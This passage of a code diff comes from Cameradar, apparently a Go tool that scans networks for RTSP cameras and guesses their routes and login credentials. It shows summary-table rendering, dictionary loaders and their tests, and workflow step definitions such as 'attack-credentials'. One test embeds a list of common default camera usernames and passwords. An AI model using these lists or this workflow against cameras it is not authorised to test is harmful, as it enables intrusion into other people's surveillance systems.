rows = append(rows[:visibleRows], summaryOverflowRow(hidden))
|
||||
}
|
||||
case len(rows) < maxRows:
|
||||
rows = padSummaryRows(rows, maxRows)
|
||||
}
|
||||
}
|
||||
|
||||
columns := summaryColumns(width, rows)
|
||||
model := table.New(
|
||||
table.WithColumns(columns),
|
||||
table.WithRows(rows),
|
||||
table.WithFocused(false),
|
||||
table.WithHeight(len(rows)),
|
||||
)
|
||||
model.SetStyles(summaryTableStyles())
|
||||
|
||||
return []summaryTable{{table: model}}
|
||||
}
|
||||
|
||||
func renderSummaryTitle(streams []cameradar.Stream) string {
|
||||
accessible, _ := partitionStreams(streams)
|
||||
return fmt.Sprintf("Summary - Streams (%d accessible / %d total)", len(accessible), len(streams))
|
||||
}
|
||||
|
||||
func summaryStatusAllDone() map[cameradar.Step]state {
|
||||
status := make(map[cameradar.Step]state)
|
||||
for _, step := range cameradar.Steps() {
|
||||
status[step] = stateDone
|
||||
}
|
||||
return status
|
||||
}
|
||||
|
||||
const emptyEntry = "—"
|
||||
|
||||
func emptySummaryRow() table.Row {
|
||||
row := make(table.Row, summaryColumnCount)
|
||||
for i := range row {
|
||||
row[i] = emptyEntry
|
||||
}
|
||||
return row
|
||||
}
|
||||
|
||||
func padSummaryRows(rows []table.Row, maxRows int) []table.Row {
|
||||
for len(rows) < maxRows {
|
||||
rows = append(rows, emptySummaryRow())
|
||||
}
|
||||
return rows
|
||||
}
|
||||
|
||||
func summaryOverflowRow(hidden int) table.Row {
|
||||
row := emptySummaryRow()
|
||||
if hidden <= 0 {
|
||||
return row
|
||||
}
|
||||
label := "\u2026 1 more stream"
|
||||
if hidden > 1 {
|
||||
label = fmt.Sprintf("\u2026 %d more streams", hidden)
|
||||
}
|
||||
row[0] = label
|
||||
return row
|
||||
}
|
||||
|
||||
func renderSummaryTablePlain(columns []table.Column, rows []table.Row) string {
|
||||
colWidths := make([]int, len(columns))
|
||||
for i, col := range columns {
|
||||
colWidths[i] = max(col.Width, len([]rune(col.Title)))
|
||||
}
|
||||
|
||||
var builder strings.Builder
|
||||
builder.WriteString(renderSummaryBorder("┌", "┬", "┐", colWidths))
|
||||
builder.WriteString("\n")
|
||||
builder.WriteString(renderSummaryRow(columnTitles(columns), colWidths))
|
||||
builder.WriteString("\n")
|
||||
builder.WriteString(renderSummaryBorder("├", "┼", "┤", colWidths))
|
||||
for _, row := range rows {
|
||||
builder.WriteString("\n")
|
||||
builder.WriteString(renderSummaryRow(row, colWidths))
|
||||
}
|
||||
builder.WriteString("\n")
|
||||
builder.WriteString(renderSummaryBorder("└", "┴", "┘", colWidths))
|
||||
return builder.String()
|
||||
}
|
||||
|
||||
func renderSummaryBorder(left, middle, right string, widths []int) string {
|
||||
parts := make([]string, 0, len(widths))
|
||||
for _, width := range widths {
|
||||
parts = append(parts, strings.Repeat("─", width+2))
|
||||
}
|
||||
return left + strings.Join(parts, middle) + right
|
||||
}
|
||||
|
||||
func renderSummaryRow(cells []string, widths []int) string {
|
||||
var builder strings.Builder
|
||||
builder.WriteString("│")
|
||||
for i, width := range widths {
|
||||
value := ""
|
||||
if i < len(cells) {
|
||||
value = cells[i]
|
||||
}
|
||||
builder.WriteString(" ")
|
||||
builder.WriteString(padAndTrim(value, width))
|
||||
builder.WriteString(" │")
|
||||
}
|
||||
return builder.String()
|
||||
}
|
||||
|
||||
func padAndTrim(value string, width int) string {
|
||||
if width <= 0 {
|
||||
return ""
|
||||
}
|
||||
runes := []rune(value)
|
||||
if len(runes) > width {
|
||||
return string(runes[:width])
|
||||
}
|
||||
if len(runes) < width {
|
||||
return string(runes) + strings.Repeat(" ", width-len(runes))
|
||||
}
|
||||
return value
|
||||
}
|
||||
|
||||
func columnTitles(columns []table.Column) []string {
|
||||
if len(columns) == 0 {
|
||||
return nil
|
||||
}
|
||||
titles := make([]string, len(columns))
|
||||
for i, col := range columns {
|
||||
titles[i] = col.Title
|
||||
}
|
||||
return titles
|
||||
}
|
||||
|
||||
func buildSummaryRows(streams []cameradar.Stream, visibility summaryVisibilityState) []table.Row {
|
||||
rows := make([]table.Row, 0, len(streams))
|
||||
for _, stream := range streams {
|
||||
target := fmt.Sprintf("%s:%d", stream.Address.String(), stream.Port)
|
||||
device := emptyEntry
|
||||
if visibility.showDevice && stream.Device != "" {
|
||||
device = stream.Device
|
||||
}
|
||||
|
||||
routes := emptyEntry
|
||||
if visibility.showRoutes && len(stream.Routes) > 0 {
|
||||
routes = strings.Join(stream.Routes, ", ")
|
||||
}
|
||||
|
||||
credentials := emptyEntry
|
||||
if visibility.showCredentials && stream.CredentialsFound {
|
||||
credentials = fmt.Sprintf("%s:%s", stream.Username, stream.Password)
|
||||
}
|
||||
|
||||
available := emptyEntry
|
||||
if visibility.showAvailable {
|
||||
available = "no"
|
||||
if stream.Available {
|
||||
available = "yes"
|
||||
}
|
||||
}
|
||||
|
||||
rtspURL := emptyEntry
|
||||
if visibility.showCredentials && stream.RouteFound && stream.CredentialsFound {
|
||||
rtspURL = formatRTSPURL(stream)
|
||||
}
|
||||
|
||||
authType := emptyEntry
|
||||
if visibility.showAuth {
|
||||
authType = authTypeLabel(stream.AuthenticationType)
|
||||
}
|
||||
|
||||
rows = append(rows, table.Row{
|
||||
target,
|
||||
device,
|
||||
authType,
|
||||
routes,
|
||||
credentials,
|
||||
available,
|
||||
rtspURL,
|
||||
adminPanelLabel(stream, visibility),
|
||||
})
|
||||
}
|
||||
|
||||
return rows
|
||||
}
|
||||
|
||||
func summaryColumns(width int, rows []table.Row) []table.Column {
|
||||
columns := []table.Column{
|
||||
{Title: "Target", Width: 18},
|
||||
{Title: "Device", Width: 14},
|
||||
{Title: "Auth", Width: 8},
|
||||
{Title: "Routes", Width: 18},
|
||||
{Title: "Credentials", Width: 16},
|
||||
{Title: "Available", Width: 9},
|
||||
{Title: "RTSP URL", Width: 30},
|
||||
{Title: "Admin", Width: 24},
|
||||
}
|
||||
columns[6].Width = maxColumnWidth(columns[6].Title, rows, 6, columns[6].Width)
|
||||
columns[7].Width = maxColumnWidth(columns[7].Title, rows, 7, columns[7].Width)
|
||||
|
||||
if width <= 0 {
|
||||
return columns
|
||||
}
|
||||
|
||||
columns = clampColumns(columns, max(width-2, 60))
|
||||
|
||||
return columns
|
||||
}
|
||||
|
||||
func clampColumns(columns []table.Column, maxWidth int) []table.Column {
|
||||
padding := 2 * len(columns)
|
||||
contentWidth := 0
|
||||
for _, col := range columns {
|
||||
contentWidth += col.Width
|
||||
}
|
||||
contentWidth += padding
|
||||
if contentWidth <= maxWidth {
|
||||
return columns
|
||||
}
|
||||
|
||||
over := contentWidth - maxWidth
|
||||
shrinkOrder := []int{7, 3, 4, 1}
|
||||
minWidths := map[int]int{
|
||||
7: 10,
|
||||
3: 10,
|
||||
4: 10,
|
||||
1: 10,
|
||||
}
|
||||
for over > 0 {
|
||||
changed := false
|
||||
for _, idx := range shrinkOrder {
|
||||
minWidth := minWidths[idx]
|
||||
if columns[idx].Width > minWidth {
|
||||
columns[idx].Width--
|
||||
over--
|
||||
changed = true
|
||||
if over == 0 {
|
||||
break
|
||||
}
|
||||
}
|
||||
}
|
||||
if !changed {
|
||||
break
|
||||
}
|
||||
}
|
||||
|
||||
return columns
|
||||
}
|
||||
|
||||
func summaryTableStyles() table.Styles {
|
||||
styles := table.DefaultStyles()
|
||||
styles.Header = styles.Header.
|
||||
BorderStyle(lipgloss.NormalBorder()).
|
||||
BorderForeground(lipgloss.Color("240")).
|
||||
BorderBottom(true).
|
||||
Bold(true)
|
||||
styles.Selected = lipgloss.NewStyle()
|
||||
styles.Cell = styles.Cell.Padding(0, 1)
|
||||
return styles
|
||||
}
|
||||
|
||||
func maxColumnWidth(title string, rows []table.Row, idx, minWidth int) int {
|
||||
width := max(len(title), minWidth)
|
||||
for _, row := range rows {
|
||||
if idx >= len(row) {
|
||||
continue
|
||||
}
|
||||
if len(row[idx]) > width {
|
||||
width = len(row[idx])
|
||||
}
|
||||
}
|
||||
return width
|
||||
}
|
||||
|
||||
func adminPanelLabel(stream cameradar.Stream, visibility summaryVisibilityState) string {
|
||||
if !visibility.showCredentials || !stream.CredentialsFound {
|
||||
return emptyEntry
|
||||
}
|
||||
return formatAdminPanelURL(stream)
|
||||
}
|
||||
|
||||
type summaryVisibilityState struct {
|
||||
showDevice bool
|
||||
showRoutes bool
|
||||
showAuth bool
|
||||
showCredentials bool
|
||||
showAvailable bool
|
||||
}
|
||||
|
||||
func summaryVisibility(status map[cameradar.Step]state) summaryVisibilityState {
|
||||
return summaryVisibilityState{
|
||||
showDevice: stepComplete(status, cameradar.StepScan),
|
||||
showRoutes: stepComplete(status, cameradar.StepAttackRoutes),
|
||||
showAuth: stepComplete(status, cameradar.StepDetectAuth),
|
||||
showCredentials: stepComplete(status, cameradar.StepAttackCredentials),
|
||||
showAvailable: stepComplete(status, cameradar.StepValidateStreams),
|
||||
}
|
||||
}
|
||||
|
||||
func stepComplete(status map[cameradar.Step]state, step cameradar.Step) bool {
|
||||
if status == nil {
|
||||
return false
|
||||
}
|
||||
switch status[step] {
|
||||
case stateDone, stateError:
|
||||
return true
|
||||
default:
|
||||
return false
|
||||
}
|
||||
}
|
||||
|
||||
func copyStreams(streams []cameradar.Stream) []cameradar.Stream {
|
||||
if len(streams) == 0 {
|
||||
return nil
|
||||
}
|
||||
|
||||
cloned := make([]cameradar.Stream, len(streams))
|
||||
copy(cloned, streams)
|
||||
return cloned
|
||||
}
|
||||
-109
@@ -1,109 +0,0 @@
|
||||
package cmrdr
|
||||
|
||||
import (
|
||||
"bufio"
|
||||
"encoding/json"
|
||||
"io"
|
||||
"io/ioutil"
|
||||
"os"
|
||||
"strings"
|
||||
|
||||
"github.com/pkg/errors"
|
||||
)
|
||||
|
||||
var fs fileSystem = osFS{}
|
||||
|
||||
type fileSystem interface {
|
||||
Open(name string) (file, error)
|
||||
Stat(name string) (os.FileInfo, error)
|
||||
}
|
||||
|
||||
type file interface {
|
||||
io.Closer
|
||||
io.Reader
|
||||
io.ReaderAt
|
||||
io.Seeker
|
||||
Stat() (os.FileInfo, error)
|
||||
}
|
||||
|
||||
// osFS implements fileSystem using the local disk.
|
||||
type osFS struct{}
|
||||
|
||||
func (osFS) Open(name string) (file, error) { return os.Open(name) }
|
||||
func (osFS) Stat(name string) (os.FileInfo, error) { return os.Stat(name) }
|
||||
|
||||
// LoadCredentials opens a dictionary file and returns its contents as a Credentials structure
|
||||
func LoadCredentials(path string) (Credentials, error) {
|
||||
var creds Credentials
|
||||
|
||||
// Open & Read XML file
|
||||
content, err := ioutil.ReadFile(path)
|
||||
if err != nil {
|
||||
return creds, errors.Wrap(err, "could not read credentials dictionary file at "+path+":")
|
||||
}
|
||||
|
||||
// Unmarshal content of JSON file into data structure
|
||||
err = json.Unmarshal(content, &creds)
|
||||
if err != nil {
|
||||
return creds, err
|
||||
}
|
||||
|
||||
return creds, nil
|
||||
}
|
||||
|
||||
// LoadRoutes opens a dictionary file and returns its contents as a Routes structure
|
||||
func LoadRoutes(path string) (Routes, error) {
|
||||
file, err := os.Open(path)
|
||||
if err != nil {
|
||||
return nil, err
|
||||
}
|
||||
defer file.Close()
|
||||
|
||||
var routes Routes
|
||||
scanner := bufio.NewScanner(file)
|
||||
|
||||
for scanner.Scan() {
|
||||
routes = append(routes, scanner.Text())
|
||||
}
|
||||
|
||||
return routes, scanner.Err()
|
||||
}
|
||||
|
||||
// ParseCredentialsFromString parses a dictionary string and returns its contents as a Credentials structure
|
||||
func ParseCredentialsFromString(content string) (Credentials, error) {
|
||||
var creds Credentials
|
||||
|
||||
// Unmarshal content of JSON file into data structure
|
||||
err := json.Unmarshal([]byte(content), &creds)
|
||||
if err != nil {
|
||||
return creds, err
|
||||
}
|
||||
|
||||
return creds, nil
|
||||
}
|
||||
|
||||
// ParseRoutesFromString parses a dictionary string and returns its contents as a Routes structure
|
||||
func ParseRoutesFromString(content string) Routes {
|
||||
return strings.Split(content, "\n")
|
||||
}
|
||||
|
||||
// ParseTargetsFile parses an input file containing hosts to targets
|
||||
func ParseTargetsFile(path string) ([]string, error) {
|
||||
_, err := fs.Stat(path)
|
||||
if err != nil {
|
||||
return []string{path}, nil
|
||||
}
|
||||
|
||||
file, err := fs.Open(path)
|
||||
if err != nil {
|
||||
return []string{path}, err
|
||||
}
|
||||
defer file.Close()
|
||||
|
||||
bytes, err := ioutil.ReadAll(file)
|
||||
if err != nil {
|
||||
return []string{path}, err
|
||||
}
|
||||
|
||||
return strings.Split(string(bytes), "\n"), nil
|
||||
}
|
||||
-428
@@ -1,428 +0,0 @@
|
||||
package cmrdr
|
||||
|
||||
import (
|
||||
"bytes"
|
||||
"fmt"
|
||||
"io/ioutil"
|
||||
"os"
|
||||
"testing"
|
||||
|
||||
"github.com/stretchr/testify/assert"
|
||||
"github.com/stretchr/testify/mock"
|
||||
)
|
||||
|
||||
// Setup Mock
|
||||
type mockedFS struct {
|
||||
osFS
|
||||
|
||||
fileExists bool
|
||||
openError bool
|
||||
|
||||
fileMock *fileMock
|
||||
|
||||
fileSize int64
|
||||
}
|
||||
|
||||
// fileMock mocks a file
|
||||
type fileMock struct {
|
||||
mock.Mock
|
||||
|
||||
readError bool
|
||||
|
||||
bytes.Buffer
|
||||
}
|
||||
|
||||
type mockedFileInfo struct {
|
||||
os.FileInfo
|
||||
}
|
||||
|
||||
func (m mockedFileInfo) Size() int64 { return 1 }
|
||||
|
||||
func (m mockedFS) Stat(name string) (os.FileInfo, error) {
|
||||
if !m.fileExists {
|
||||
return nil, os.ErrNotExist
|
||||
}
|
||||
return mockedFileInfo{}, nil
|
||||
}
|
||||
|
||||
func (m mockedFS) Open(name string) (file, error) {
|
||||
if m.openError {
|
||||
return nil, os.ErrNotExist
|
||||
}
|
||||
|
||||
return m.fileMock, nil
|
||||
}
|
||||
|
||||
func (m *fileMock) Read(p []byte) (n int, err error) {
|
||||
if m.readError {
|
||||
return 0, os.ErrNotExist
|
||||
}
|
||||
return m.Buffer.Read(p)
|
||||
}
|
||||
|
||||
func (m *fileMock) ReadAt(p []byte, off int64) (n int, err error) {
|
||||
return 1, nil
|
||||
}
|
||||
|
||||
func (m *fileMock) Seek(offset int64, whence int) (int64, error) {
|
||||
return offset, nil
|
||||
}
|
||||
|
||||
func (m *fileMock) Stat() (os.FileInfo, error) {
|
||||
return mockedFileInfo{}, nil
|
||||
}
|
||||
|
||||
// Close mock
|
||||
func (m *fileMock) Close() error {
|
||||
args := m.Called()
|
||||
return args.Error(0)
|
||||
}
|
||||
|
||||
// Sync mock
|
||||
func (m *fileMock) Sync() error {
|
||||
args := m.Called()
|
||||
return args.Error(0)
|
||||
}
|
||||
|
||||
func TestLoadCredentials(t *testing.T) {
|
||||
credentialsJSONString := []byte("{\"usernames\":[\"admin\",\"root\"],\"passwords\":[\"12345\",\"root\"]}")
|
||||
validCredentials := Credentials{
|
||||
Usernames: []string{"admin", "root"},
|
||||
Passwords: []string{"12345", "root"},
|
||||
}
|
||||
|
||||
testCases := []struct {
|
||||
input []byte
|
||||
fileExists bool
|
||||
|
||||
expectedOutput Credentials
|
||||
expectedErrMsg string
|
||||
}{
|
||||
// Valid baseline
|
||||
{
|
||||
fileExists: true,
|
||||
input: credentialsJSONString,
|
||||
expectedOutput: validCredentials,
|
||||
},
|
||||
// File does not exist
|
||||
{
|
||||
fileExists: false,
|
||||
input: credentialsJSONString,
|
||||
expectedErrMsg: "could not read credentials dictionary file at",
|
||||
},
|
||||
// Invalid format
|
||||
{
|
||||
fileExists: true,
|
||||
input: []byte("not json"),
|
||||
expectedErrMsg: "invalid character",
|
||||
},
|
||||
// No streams in dictionary
|
||||
{
|
||||
fileExists: true,
|
||||
input: []byte("{\"invalid\":\"json\"}"),
|
||||
},
|
||||
}
|
||||
|
||||
for i, test := range testCases {
|
||||
filePath := "/tmp/cameradar_test_load_credentials_" + fmt.Sprint(i) + ".xml"
|
||||
// create file
|
||||
if test.fileExists {
|
||||
_, err := os.Create(filePath)
|
||||
if err != nil {
|
||||
fmt.Printf("could not create xml file for LoadCredentials: %v. iteration: %d. file path: %s\n", err, i, filePath)
|
||||
os.Exit(1)
|
||||
}
|
||||
|
||||
err = ioutil.WriteFile(filePath, test.input, 0644)
|
||||
if err != nil {
|
||||
fmt.Printf("could not write xml file for LoadCredentials: %v. iteration: %d. file path: %s\n", err, i, filePath)
|
||||
os.Exit(1)
|
||||
}
|
||||
}
|
||||
|
||||
result, err := LoadCredentials(filePath)
|
||||
if len(test.expectedErrMsg) > 0 {
|
||||
if err == nil {
|
||||
fmt.Printf("unexpected success in LoadCredentials test, iteration %d. expected error: %s\n", i, test.expectedErrMsg)
|
||||
os.Exit(1)
|
||||
}
|
||||
|
||||
assert.Contains(t, err.Error(), test.expectedErrMsg, "wrong error message")
|
||||
} else {
|
||||
if err != nil {
|
||||
fmt.Printf("unexpected error in LoadCredentials test, iteration %d: %v\n", i, err)
|
||||
os.Exit(1)
|
||||
}
|
||||
|
||||
for _, expectedUsername := range test.expectedOutput.Usernames {
|
||||
foundUsername := false
|
||||
for _, username := range result.Usernames {
|
||||
if username == expectedUsername {
|
||||
foundUsername = true
|
||||
}
|
||||
}
|
||||
|
||||
assert.Equal(t, true, foundUsername, "wrong usernames parsed")
|
||||
}
|
||||
|
||||
for _, expectedPassword := range test.expectedOutput.Passwords {
|
||||
foundPassword := false
|
||||
for _, password := range result.Passwords {
|
||||
if password == expectedPassword {
|
||||
foundPassword = true
|
||||
}
|
||||
}
|
||||
|
||||
assert.Equal(t, true, foundPassword, "wrong passwords parsed")
|
||||
}
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
func TestLoadRoutes(t *testing.T) {
|
||||
routesJSONString := []byte("admin\nroot")
|
||||
validRoutes := Routes{"admin", "root"}
|
||||
|
||||
testCases := []struct {
|
||||
input []byte
|
||||
fileExists bool
|
||||
|
||||
expectedOutput Routes
|
||||
expectedErrMsg string
|
||||
}{
|
||||
// Valid baseline
|
||||
{
|
||||
fileExists: true,
|
||||
input: routesJSONString,
|
||||
expectedOutput: validRoutes,
|
||||
},
|
||||
// File does not exist
|
||||
{
|
||||
fileExists: false,
|
||||
input: routesJSONString,
|
||||
expectedErrMsg: "no such file or directory",
|
||||
},
|
||||
// No streams in dictionary
|
||||
{
|
||||
fileExists: true,
|
||||
input: []byte(""),
|
||||
},
|
||||
}
|
||||
|
||||
for i, test := range testCases {
|
||||
filePath := "/tmp/cameradar_test_load_routes_" + fmt.Sprint(i) + ".xml"
|
||||
|
||||
// create file
|
||||
if test.fileExists {
|
||||
_, err := os.Create(filePath)
|
||||
if err != nil {
|
||||
fmt.Printf("could not create xml file for LoadRoutes: %v. iteration: %d. file path: %s\n", err, i, filePath)
|
||||
os.Exit(1)
|
||||
}
|
||||
|
||||
err = ioutil.WriteFile(filePath, test.input, 0644)
|
||||
if err != nil {
|
||||
fmt.Printf("could not write xml file for LoadRoutes: %v. iteration: %d. file path: %s\n", err, i, filePath)
|
||||
os.Exit(1)
|
||||
}
|
||||
}
|
||||
|
||||
result, err := LoadRoutes(filePath)
|
||||
if len(test.expectedErrMsg) > 0 {
|
||||
if err == nil {
|
||||
fmt.Printf("unexpected success in LoadRoutes test, iteration %d. expected error: %s\n", i, test.expectedErrMsg)
|
||||
os.Exit(1)
|
||||
}
|
||||
assert.Contains(t, err.Error(), test.expectedErrMsg, "wrong error message")
|
||||
} else {
|
||||
if err != nil {
|
||||
fmt.Printf("unexpected error in LoadRoutes test, iteration %d: %v\n", i, err)
|
||||
os.Exit(1)
|
||||
}
|
||||
|
||||
for _, expectedRoute := range test.expectedOutput {
|
||||
foundRoute := false
|
||||
for _, route := range result {
|
||||
if route == expectedRoute {
|
||||
foundRoute = true
|
||||
}
|
||||
}
|
||||
|
||||
assert.Equal(t, true, foundRoute, "wrong routes parsed")
|
||||
}
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
func TestParseCredentialsFromString(t *testing.T) {
|
||||
defaultCredentials := Credentials{
|
||||
Usernames: []string{
|
||||
"",
|
||||
"admin",
|
||||
"Admin",
|
||||
"Administrator",
|
||||
"root",
|
||||
"supervisor",
|
||||
"ubnt",
|
||||
"service",
|
||||
"Dinion",
|
||||
"administrator",
|
||||
"admin1",
|
||||
},
|
||||
Passwords: []string{
|
||||
"",
|
||||
"admin",
|
||||
"9999",
|
||||
"123456",
|
||||
"pass",
|
||||
"camera",
|
||||
"1234",
|
||||
"12345",
|
||||
"fliradmin",
|
||||
"system",
|
||||
"jvc",
|
||||
"meinsm",
|
||||
"root",
|
||||
"4321",
|
||||
"111111",
|
||||
"1111111",
|
||||
"password",
|
||||
"ikwd",
|
||||
"supervisor",
|
||||
"ubnt",
|
||||
"wbox123",
|
||||
"service",
|
||||
},
|
||||
}
|
||||
|
||||
testCases := []struct {
|
||||
str string
|
||||
expectedResult Credentials
|
||||
}{
|
||||
{
|
||||
str: "{\"usernames\":[\"\",\"admin\",\"Admin\",\"Administrator\",\"root\",\"supervisor\",\"ubnt\",\"service\",\"Dinion\",\"administrator\",\"admin1\"],\"passwords\":[\"\",\"admin\",\"9999\",\"123456\",\"pass\",\"camera\",\"1234\",\"12345\",\"fliradmin\",\"system\",\"jvc\",\"meinsm\",\"root\",\"4321\",\"111111\",\"1111111\",\"password\",\"ikwd\",\"supervisor\",\"ubnt\",\"wbox123\",\"service\"]}",
|
||||
expectedResult: defaultCredentials,
|
||||
},
|
||||
{
|
||||
str: "{}",
|
||||
expectedResult: Credentials{},
|
||||
},
|
||||
{
|
||||
str: "{\"invalid_field\":42}",
|
||||
expectedResult: Credentials{},
|
||||
},
|
||||
{
|
||||
str: "not json",
|
||||
expectedResult: Credentials{},
|
||||
},
|
||||
}
|
||||
for _, test := range testCases {
|
||||
parsedCredentials, _ := ParseCredentialsFromString(test.str)
|
||||
assert.Equal(t, test.expectedResult, parsedCredentials, "unexpected result, parse error")
|
||||
}
|
||||
}
|
||||
|
||||
func TestParseRoutesFromString(t *testing.T) {
|
||||
testCases := []struct {
|
||||
str string
|
||||
expectedResult Routes
|
||||
}{
|
||||
{
|
||||
str: "a\nb\nc",
|
||||
expectedResult: []string{"a", "b", "c"},
|
||||
},
|
||||
{
|
||||
str: "a",
|
||||
expectedResult: []string{"a"},
|
||||
},
|
||||
{
|
||||
str: "",
|
||||
expectedResult: []string{""},
|
||||
},
|
||||
}
|
||||
for _, test := range testCases {
|
||||
parsedRoutes := ParseRoutesFromString(test.str)
|
||||
assert.Equal(t, test.expectedResult, parsedRoutes, "unexpected result, parse error")
|
||||
}
|
||||
}
|
||||
|
||||
func TestParseTargetsFile(t *testing.T) {
|
||||
|
||||
oldFS := fs
|
||||
mfs := &mockedFS{}
|
||||
fs = mfs
|
||||
defer func() {
|
||||
fs = oldFS
|
||||
}()
|
||||
|
||||
testCases := []struct {
|
||||
input string
|
||||
|
||||
fileExists bool
|
||||
openError bool
|
||||
readError bool
|
||||
|
||||
expectedResult []string
|
||||
expectedError error
|
||||
}{
|
||||
{
|
||||
input: "0.0.0.0",
|
||||
|
||||
fileExists: false,
|
||||
|
||||
expectedResult: []string{"0.0.0.0"},
|
||||
expectedError: nil,
|
||||
},
|
||||
{
|
||||
input: "test_does_not_really_exist",
|
||||
|
||||
fileExists: true,
|
||||
|
||||
expectedResult: []string{"0.0.0.0", "localhost", "192.17.0.0/16", "192.168.1.140-255", "192.168.2-3.0-255"},
|
||||
expectedError: nil,
|
||||
},
|
||||
{
|
||||
input: "test_does_not_really_exist",
|
||||
|
||||
fileExists: true,
|
||||
openError: true,
|
||||
|
||||
expectedResult: []string{"test_does_not_really_exist"},
|
||||
expectedError: os.ErrNotExist,
|
||||
},
|
||||
{
|
||||
input: "test_does_not_really_exist",
|
||||
|
||||
fileExists: true,
|
||||
readError: true,
|
||||
|
||||
expectedResult: []string{"test_does_not_really_exist"},
|
||||
expectedError: os.ErrNotExist,
|
||||
},
|
||||
}
|
||||
|
||||
for _, test := range testCases {
|
||||
mfs.fileExists = test.fileExists
|
||||
mfs.openError = test.openError
|
||||
|
||||
mfs.fileMock = &fileMock{
|
||||
readError: test.readError,
|
||||
}
|
||||
mfs.fileMock.On("Close").Return(nil)
|
||||
mfs.fileMock.WriteString("0.0.0.0\nlocalhost\n192.17.0.0/16\n192.168.1.140-255\n192.168.2-3.0-255")
|
||||
|
||||
result, err := ParseTargetsFile(test.input)
|
||||
assert.Equal(t, test.expectedResult, result, "unexpected result, parse error")
|
||||
assert.Equal(t, test.expectedError, err, "unexpected error")
|
||||
}
|
||||
}
|
||||
|
||||
// This is completely useless and just lets me
|
||||
// not look at these two red lines on the coverage
|
||||
// any longer.
|
||||
func TestFS(t *testing.T) {
|
||||
fs := osFS{}
|
||||
|
||||
fs.Open("test")
|
||||
fs.Stat("test")
|
||||
}
|
||||
@@ -1,39 +0,0 @@
|
||||
package cmrdr
|
||||
|
||||
import "time"
|
||||
|
||||
// Stream represents a camera's RTSP stream
|
||||
type Stream struct {
|
||||
Device string `json:"device"`
|
||||
Username string `json:"username"`
|
||||
Password string `json:"password"`
|
||||
Route string `json:"route"`
|
||||
Address string `json:"address" validate:"required"`
|
||||
Port uint16 `json:"port" validate:"required"`
|
||||
|
||||
CredentialsFound bool `json:"credentials_found"`
|
||||
RouteFound bool `json:"route_found"`
|
||||
Available bool `json:"available"`
|
||||
}
|
||||
|
||||
// Credentials is a map of credentials
|
||||
// usernames are keys and passwords are values
|
||||
// creds['admin'] -> 'secure_password'
|
||||
type Credentials struct {
|
||||
Usernames []string `json:"usernames"`
|
||||
Passwords []string `json:"passwords"`
|
||||
}
|
||||
|
||||
// Routes is a slice of Routes
|
||||
// ['/live.sdp', '/media.amp', ...]
|
||||
type Routes []string
|
||||
|
||||
// Options contains all options needed to launch a complete cameradar scan
|
||||
type Options struct {
|
||||
Targets []string `json:"target" validate:"required"`
|
||||
Ports []string `json:"ports"`
|
||||
Routes Routes `json:"routes"`
|
||||
Credentials Credentials `json:"credentials"`
|
||||
Speed int `json:"speed"`
|
||||
Timeout time.Duration `json:"timeout"`
|
||||
}
|
||||
+40
@@ -0,0 +1,40 @@
|
||||
package cameradar
|
||||
|
||||
import (
|
||||
"strconv"
|
||||
"strings"
|
||||
)
|
||||
|
||||
const progressMessagePrefix = "\x00progress:"
|
||||
|
||||
// ProgressTotalMessage returns a progress control message that sets the total units for a step.
|
||||
func ProgressTotalMessage(total int) string {
|
||||
return progressMessagePrefix + "total=" + strconv.Itoa(total)
|
||||
}
|
||||
|
||||
// ProgressTickMessage returns a progress control message that increments a step's progress by one unit.
|
||||
func ProgressTickMessage() string {
|
||||
return progressMessagePrefix + "tick"
|
||||
}
|
||||
|
||||
// ParseProgressMessage parses a progress control message.
|
||||
// It returns a kind of "total" or "tick" and an optional value.
|
||||
func ParseProgressMessage(message string) (string, int, bool) {
|
||||
if !strings.HasPrefix(message, progressMessagePrefix) {
|
||||
return "", 0, false
|
||||
}
|
||||
|
||||
payload := strings.TrimPrefix(message, progressMessagePrefix)
|
||||
if payload == "tick" {
|
||||
return "tick", 1, true
|
||||
}
|
||||
if valuePart, ok := strings.CutPrefix(payload, "total="); ok {
|
||||
value, err := strconv.Atoi(valuePart)
|
||||
if err != nil {
|
||||
return "", 0, false
|
||||
}
|
||||
return "total", value, true
|
||||
}
|
||||
|
||||
return "", 0, false
|
||||
}
|
||||
@@ -0,0 +1,40 @@
|
||||
package cameradar
|
||||
|
||||
import (
|
||||
"net/netip"
|
||||
)
|
||||
|
||||
// AuthType represents the RTSP authentication method.
|
||||
type AuthType int
|
||||
|
||||
// Supported authentication methods.
|
||||
const (
|
||||
AuthUnknown AuthType = iota
|
||||
AuthNone
|
||||
AuthBasic
|
||||
AuthDigest
|
||||
)
|
||||
|
||||
// Stream represents a camera's RTSP stream.
|
||||
type Stream struct {
|
||||
Device string `json:"device"`
|
||||
Username string `json:"username"`
|
||||
Password string `json:"password"`
|
||||
Routes []string `json:"route"`
|
||||
Address netip.Addr `json:"address" validate:"required"`
|
||||
Port uint16 `json:"port" validate:"required"`
|
||||
|
||||
CredentialsFound bool `json:"credentials_found"`
|
||||
RouteFound bool `json:"route_found"`
|
||||
Available bool `json:"available"`
|
||||
|
||||
AuthenticationType AuthType `json:"authentication_type"`
|
||||
}
|
||||
|
||||
// Route returns this stream's route if there is one.
|
||||
func (s Stream) Route() string {
|
||||
if len(s.Routes) > 0 {
|
||||
return s.Routes[0]
|
||||
}
|
||||
return ""
|
||||
}
|
||||
@@ -0,0 +1,74 @@
|
||||
package cameradar
|
||||
|
||||
import (
|
||||
"fmt"
|
||||
"strings"
|
||||
)
|
||||
|
||||
// Mode defines which UI renderer to use.
|
||||
type Mode string
|
||||
|
||||
// Supported rendering modes.
|
||||
const (
|
||||
ModeAuto Mode = "auto"
|
||||
ModeTUI Mode = "tui"
|
||||
ModePlain Mode = "plain"
|
||||
)
|
||||
|
||||
// Step identifies a stage in the workflow.
|
||||
type Step string
|
||||
|
||||
// Supported steps.
|
||||
const (
|
||||
StepScan Step = "scan"
|
||||
StepAttackRoutes Step = "attack-routes"
|
||||
StepDetectAuth Step = "detect-auth"
|
||||
StepAttackCredentials Step = "attack-credentials"
|
||||
StepValidateStreams Step = "validate-streams"
|
||||
StepSummary Step = "summary"
|
||||
)
|
||||
|
||||
// StepLabel returns the human-readable label for a step.
|
||||
func StepLabel(step Step) string {
|
||||
switch step {
|
||||
case StepScan:
|
||||
return "Scan targets"
|
||||
case StepAttackRoutes:
|
||||
return "Attack routes"
|
||||
case StepDetectAuth:
|
||||
return "Detect authentication"
|
||||
case StepAttackCredentials:
|
||||
return "Attack credentials"
|
||||
case StepValidateStreams:
|
||||
return "Validate streams"
|
||||
case StepSummary:
|
||||
